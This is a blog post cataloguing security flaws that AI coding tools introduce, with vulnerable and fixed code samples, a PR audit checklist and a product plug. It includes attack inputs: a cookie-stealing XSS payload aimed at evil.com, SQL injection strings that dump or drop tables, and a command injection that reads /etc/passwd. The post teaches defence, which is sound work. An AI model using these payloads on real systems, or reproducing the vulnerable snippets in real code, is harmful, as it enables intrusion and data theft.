Klark Visios

Posted on Mar 7

I Checked What Security Vulnerabilities AI Coding Tools Actually Introduce

#security #ai #webdev #vscode

Last month I started going through PRs and open-source repos, cataloging the security vulnerabilities that AI coding tools actually introduce. Not theoretical risks. Actual patterns showing up in production code, backed by security research.

The numbers are bad. Veracode tested over 100 LLMs across Java, Python, C#, and JavaScript. 45% of generated code samples failed security tests. AI tools failed to defend against XSS in 86% of relevant samples. Apiiro found that AI-assisted developers produce 3-4x more code but generate 10x more security issues. Read that again. 10x.

The patterns are predictable, though. Once you know what to look for, you start seeing them everywhere.

1. SQL injection still happening in 2026

Ask ChatGPT or Copilot for a database query endpoint and you'll get something like this:

// VULNERABLE
app.get('/user', async (req, res) => {
  const userId = req.query.id;
  const sql = `SELECT * FROM users WHERE id = ${userId}`;
  connection.query(sql, (err, results) => {
    if (err) return res.status(500).send('Error');
    res.json(results[0]);
  });
});

Send ?id=1 OR 1=1 and you dump the entire users table. Send ?id=1; DROP TABLE users;-- and it's gone.

String interpolation is shorter than parameterized queries, so that's what the model generates. It optimizes for "works," not "safe."

The fix:

// SECURE
app.get('/user', async (req, res) => {
  const userId = parseInt(req.query.id, 10);
  if (!Number.isInteger(userId)) {
    return res.status(400).send('Invalid id');
  }
  const sql = 'SELECT * FROM users WHERE id = ?';
  connection.query(sql, [userId], (err, results) => {
    if (err) return res.status(500).send('Error');
    res.json(results[0]);
  });
});

Same thing in Python. AI generates f-strings in SQL every time:

# VULNERABLE
query = f"SELECT * FROM posts WHERE title LIKE '%{term}%'"
cur.execute(query)

# SECURE
query = "SELECT * FROM posts WHERE title LIKE ?"
cur.execute(query, (f"%{term}%",))

Why? Training data is full of tutorials and Stack Overflow answers that use string interpolation for brevity. The model just reproduces the most common pattern, and the most common pattern happens to be the insecure one.

2. XSS, with an 86% failure rate

Veracode's number on this one surprised me. 86% of the time, AI-generated code failed to defend against cross-site scripting. The pattern is simple:

// VULNERABLE
app.get('/greet', (req, res) => {
  const name = req.query.name || 'Guest';
  res.send(`<h1>Hello, ${name}!</h1>`);
});

Payload: ?name=<script>fetch('https://evil.com/steal?c='+document.cookie)</script>

In React and Next.js it looks different but the result is the same:

// VULNERABLE
function Comment({ text }: { text: string }) {
  return <div dangerouslySetInnerHTML={{ __html: text }} />;
}

If text comes from user input or an API without sanitization, you've got stored XSS.

The fixes:

// Server-side: escape HTML
function escapeHtml(str) {
  return String(str)
    .replace(/&/g, '&amp;').replace(/</g, '&lt;')
    .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}
app.get('/greet', (req, res) => {
  const name = escapeHtml(req.query.name || 'Guest');
  res.send(`<h1>Hello, ${name}!</h1>`);
});

// React: render as text, not HTML
function Comment({ text }: { text: string }) {
  return <div>{text}</div>;
}

Most training examples show the shortest path to rendering dynamic content. Output encoding adds code that doesn't make demos look better, so the model skips it.

3. Hardcoded secrets

This one is everywhere, and I mean everywhere. GitGuardian analyzed ~20,000 Copilot-active repos and found a 6.4% secret leakage rate vs 4.6% across all public repos, about 40% higher (State of Secrets Sprawl 2025).

// VULNERABLE
const STRIPE_KEY = 'sk_live_51Nxxxxxxxxxxxxxxxx';
const DB_PASSWORD = 'P@ssw0rd123';
const JWT_SECRET = 'my_super_secret_jwt_key';

const stripe = require('stripe')(STRIPE_KEY);

The model saw thousands of tutorials with hardcoded keys. It reproduces them faithfully.

# VULNERABLE
SMTP_USER = "noreply@example.com"
SMTP_PASS = "supersecretpassword"

server = smtplib.SMTP("smtp.example.com", 587)
server.login(SMTP_USER, SMTP_PASS)

The fix is obvious but the AI doesn't apply it:

// SECURE
const STRIPE_KEY = process.env.STRIPE_API_KEY;
if (!STRIPE_KEY) throw new Error('Missing STRIPE_API_KEY');

const stripe = require('stripe')(STRIPE_KEY);

Here's the thing that makes this worse than the other patterns: these secrets end up in git history. Even if you delete them from the file, they're recoverable from the commit log. One leaked Stripe key means unauthorized charges. One leaked AWS credential can mean someone owns your entire infrastructure.

4. Command injection

Ask AI to "run a ping command" or "create a backup" and you'll get exec() with template literals:

// VULNERABLE
const { exec } = require('child_process');

app.post('/ping', (req, res) => {
  const host = req.body.host;
  exec(`ping -c 4 ${host}`, (error, stdout) => {
    res.send(stdout);
  });
});

Send host=8.8.8.8; cat /etc/passwd and you get the server's password file.

# VULNERABLE
cmd = f"tar -czf /tmp/backup.tgz {path}"
subprocess.check_output(cmd, shell=True)

The fix:

// SECURE
const { spawn } = require('child_process');

app.post('/ping', (req, res) => {
  const host = req.body.host;
  if (!/^[a-zA-Z0-9.\-]{1,253}$/.test(host)) {
    return res.status(400).send('Invalid host');
  }
  const child = spawn('ping', ['-c', '4', host], { shell: false });
  let output = '';
  child.stdout.on('data', d => output += d);
  child.on('close', () => res.send(output));
});

exec() with template literals is fewer lines than spawn() with argument arrays. The model picks the concise path.

5. The ones that pass code review

These aren't exotic. They're the kind of thing you'd glance at and approve because nothing looks obviously wrong.

Empty catch blocks that silently bypass auth:

try { await verifyToken(token); }
catch (e) { /* AI leaves this empty */ }
// Execution continues even if token is invalid

CORS wildcards on APIs that use cookies or tokens:

app.use(cors({ origin: '*' }));

The AI "fix" for certificate errors in Python:

requests.get(url, verify=False)

Math.random where you need unpredictable tokens:

// VULNERABLE
const token = Math.random().toString(36).substring(2);

// SECURE
const token = crypto.randomBytes(32).toString('hex');

Client-side auth with no server-side validation:

function AdminPage() {
  const { user } = useAuth();
  if (!user?.isAdmin) return <Redirect to="/" />;
  return <AdminDashboard />;
  // Meanwhile, the API endpoints have zero auth checks
}

None of these alone will make headlines. But they show up in clusters, and they compound. I've seen PRs with three or four of these at once.

The scale of this

85% of developers now use AI coding assistants (JetBrains 2025). 46% of new code from active Copilot users is AI-generated, up from 27% in 2022. Somewhere between 40% and 62% of that code has security vulnerabilities, depending on which study you look at.

Fixing a vulnerability during code review costs $200-800 in developer time. In production? $3,000-10,000+. If it leads to a breach, IBM puts the average at $4.44 million.

The Stanford/Boneh research group found something that I keep coming back to: developers using AI wrote less secure code while feeling more confident about security. That confidence gap might be the most dangerous part of all this.

Quick PR audit checklist

Before you merge your next PR, grep or ctrl+F for these:

String interpolation in SQL - any ${} or f-string near SELECT, INSERT, UPDATE, DELETE
innerHTML / dangerouslySetInnerHTML - if the data comes from users or an API, it's XSS
Hardcoded strings that look like keys - sk_live_, AKIA, ghp_, passwords in quotes
exec() or shell=True with variables - if user input reaches a shell command, it's game over
Empty catch blocks - especially around auth/token verification
Math.random() for tokens or IDs - predictable, not secure
cors({ origin: '*' }) on routes that use cookies or auth headers
verify=False in Python requests - disables all TLS checks
Client-side-only auth - open each API route that serves sensitive data and verify there's a server-side auth check

If you find zero issues, either your codebase is unusually clean or you're not looking hard enough. I've never audited a repo with AI-generated code and come up empty.

What I do about it

I'm not going to tell you to stop using AI coding tools. I use them every day. But I've started treating AI-generated code the way I'd treat code from a fast but careless junior developer: assume security is missing until proven otherwise.

The checklist above catches the pattern-level stuff. For logic-level vulnerabilities (auth bypasses, SSRF, broken session management), I run a separate AI pass specifically prompted for security analysis. AI is actually good at finding vulnerabilities when you explicitly ask it to look for them.

I ended up automating both of those steps into a VS Code extension called Git AutoReview. It runs 15 regex security rules locally plus a specialized AI security pass on every PR. Works with GitHub, GitLab, and Bitbucket. BYOK, so your code goes straight to your AI provider. Free tier is 10 reviews/day.

But the checklist works without any tool. Print it, tape it to your monitor, run it on your last three PRs. I'd bet money you'll find something.

Sources: Stanford/NYU Copilot Study, Veracode 2025 GenAI Code Security Report, IBM 2025 Cost of a Data Breach, Apiiro (June 2025), GitGuardian Secret Sprawl Report, Kaspersky Blog: Vibe Coding Security Risks, OWASP Top 10 2025.